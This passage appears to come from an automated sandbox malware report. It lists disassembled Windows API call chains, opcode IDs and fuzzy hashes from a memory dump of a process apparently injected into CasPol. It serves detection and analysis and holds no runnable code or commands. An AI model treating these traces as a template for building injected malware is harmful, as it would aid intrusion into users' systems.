                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2154303073-0
                                                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3150196962-0
                                                                                                                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                  APIs
                                                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$PointerRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3154509469-0
                                                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4232544981-0
                                                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3859505661-0
                                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                  APIs
                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738559852-0
                                                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3934441357-0
                                                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                  APIs
                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnumNamesResource
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3334572018-0
                                                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                  APIs
                                                                                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFind
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1863332320-0
                                                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 71445658-0
                                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3655998216-0
                                                                                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1828521557-0
                                                                                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2081463915-0
                                                                                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2136311172-0
                                                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                  APIs
